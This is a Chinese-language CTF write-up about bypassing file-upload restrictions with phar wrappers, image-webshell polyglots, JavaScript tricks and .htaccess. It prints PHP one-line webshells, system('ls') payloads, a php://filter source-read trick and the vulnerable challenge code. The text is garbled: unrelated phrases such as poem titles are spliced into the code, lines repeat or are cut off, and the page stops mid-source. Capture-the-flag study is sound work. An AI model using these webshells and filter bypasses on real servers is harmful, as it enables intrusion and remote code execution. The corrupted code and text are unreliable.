uploaded是什么意思oaded在线翻译读音例

CTF⽂件上传相关⼩结

最近刷了⼏道⽂件上传的题，其中包括js绕过、.htaccess上传、phar绕过，⽂件上传的题⽬⼀般都是⿊盒，⽩盒审计

很少，奇奇怪怪的东西还是挺多的。就我⾃⼰来说，做这种题⼀般都是各种都试试，基本上都能出来。

姿势⼀：Pr绕过上传限制

进⾏压缩，之后把rar的后缀名改成jpeg格式

⾸先我们在本地测试⼀下:准备⼀句话⽊马

<?php@eval($_POST[\"cmd\"]);?>

可以看到，是可以执⾏的。

安恒⽉赛：image_up

⾸先我们把源码读出来:

这⾥是利⽤伪协议读取源码/?page=php://filter/read=convert.-encode/resource=

<?php

if(isset($_GET[\'page\'])){

if(!stristr($_GET[\'page\'],\"..\")){

$page=$_GET[\'page\'].\".php\";

include($page);

}else{

header(\"Location:?page=login\");}

}else{

header(\"Location:?page=login\");

}

<?php

if(isset($_POST[\'username\'])&&isset($_POST[\'password\'])){

header(\"Loca最美的十首短诗 tion:?page=upload\");

exit();}

>

<?php

$error=\"\";

$exts=array(\"jpg\",\"png\",\"gif\",\"jpeg\");

if(!empty($_FILES[\"ima关于春天的诗歌简短 ge\"]))

{

$temp=explode(\".\",$_FILES[\"image\"][\"name\"]);

$extension=end($temp);if((@$_upfileS[\"image\"][\"size\"]<102400)){

if(in_array($extension,$exts)){

$path=\"uploads/\".md5($temp[0].time()).\".\".$extens

move_uploaded_file($_FILES[\"image\"][\"tmp_name\"],$p$error=\"上传成功!\";

}else{

$error=\"上传失败!\";}

}else{

$error=\"⽂件过⼤，上传失败!\";

}}

>

这道题就是利⽤phar伪协议去包含我们写好的⼀句话

具体做法:⽊马⽂件打包成压缩包，然后改后缀，再利⽤phar伪协议读取

phar://./uploads//1

最后⽤蚁剑链接就可以拿到flag

姿势⼆：js绕过

例题⼀

查看源码之后发现⽂件上传，图⽚马

先来做⼀个吧

合成图⽚马的命令:/b+/

我们先来上传⼀个⼀句话⽊马吧，

这⾥发现是能够上传成功的，但是不解析，最后利⽤JS绕过payload:

system(\"ls\")

利⽤file读取上传的⽂件，发现是解析php⽂件的

查看⽂件名发现有flag相关⽂件，直接读就出

例题⼆：安恒A计划

先附上源码吧

php

error_reporting(0);highlight_file(__FILE__);

$file=$_GET[\'file\'];

if(preg_match(\"/flag/\",$file)){

die(\'Ohno!\');

}

include$file;

>

file_

<?php

error_reporting(0);

date_default_timezone_set(\'PRC\');

if(isset($_FILES[\'file\'])){

$file_name=basename($_FILES[\"file\"][\"name\"]);

$file_ext=pathinfo($file_name,PATHINFO_EXTENSION);

$file_type=$_FILES[\'file\'][\'type\'];

$file_content=$_FILES[\'file\'][\'tmp_name\'];if(in_array($file_ext,[\'php\',\'php3\',\'php4\',\'php5\',\'phtml

$file_content=$_FILES[\'file\'][\'tmp_name\'];if(in_array($file_ext,[\'php\',\'php3\',\'php4\',\'php5\',\'phtml

\',\'pht\'])){

die(\'Phpfile?\');

}

if(!in_array($file_typ世无良猫翻译 e,[\'image/jpeg\',\'image/gif\',\'image/png\'])){

die(\'Badfile\');

}

if(preg_match(\"/<?php|eval|assert|@/i\",file_get_contents($file_content))){

die(\'Badfileofcontent!\');

}

if(!file_exists(\'uploads\')){mkdir(\'uploads\');

}

$new_filename=md5(time()).\'.\'.$file_ext;

$u=move_uploaded_file($_FILES[\'file\'][\'tmp_nam七夕节的由来简介 e\'],\'./uploa

ds/\'.$new_filen启迪的近义词 ame);if($u){

echo\'Successful\'.\"n\";

echo\'/uploads/\'.$new_filename;}

}

>

Fileupload

Filename:

审计了⼀下，估计也就是js合成个图⽚马

php⽂件:

system(\'ls\');

合成⽊马直接上传，

//?file=/var/www/html/uploads/

利⽤⼀下⽂件包含

直接查看flag⽂件

例题三：[GXYCTF2休问梁园旧宾客 019]BabyUpload

eval($_POST[1]);

合成图⽚马:

直接上传蚁剑连接

源码:

<?php

session_start();

echo\"

上传⽂件

\";

error_reporting(0);

if(!isset($_SESSION[\'user\'])){

$_SESSION[\'user\']=md5((string)time().(string)rand(100,1000));

}

if(isset($_FILES[\'uploaded\'])){

$target_path=getcwd().\"/upload/\".md5($_SESSION[\'user\']);

$t_path=$target_path.\"/\".basename($_FILES[\'uploaded\'][\'name\']);

$uploaded_name=$_FILES[\'uploaded\'][\'name\'];

$uploaded_ext=substr($uploaded_name,strrpos($uploaded_name,\'.\')+1);

$uploaded_size=$_FILES[\'uploaded\'][\'size\'];

$uploaded_size=$_FILES[\'uploaded\'][\'size\'];

$uploaded_tmp=$_FILES[\'uploaded\'][\'tmp_name\'];

if(preg_match(\"/ph/i\",strtolower($uploaded_ext))){

die(\"后缀名不能有ph!\");

}else{

if((($_FILES[\"uploaded\"][\"type\"]==\"\")||($_FILES[\"uploaded\"][\"type\"]==\"image/jpeg\")|

|($_FILES[\"uploaded\"][\"type\"]==\"image/pjpeg\"))&&($_FILES[\"uploaded\"][\"size\"]<2048)){

$content=file_get_contents($uploaded_tmp);

if(preg_match(\"/<?/i\",$content)){

die(\"诶，别蒙我啊，这标志明显还是php啊\");

}

else{

mkdir(iconv(\"UTF-8\",\"骐骥一跃 GBK\",$target_path),0777,

true);

move_uploaded_file($uploaded_tmp,$t_path);

echo\"{$t_path}succesfullyuploaded!\";

}

}else{

die(\"上传类型也太露⾻了吧!\");}

}

}

>

姿势三：.htaccess上传

我们把content-type改成image/jpeg格式

发现上传成功，下⼀步就是传图⽚马

源码:

<?php

session_start();

echo\"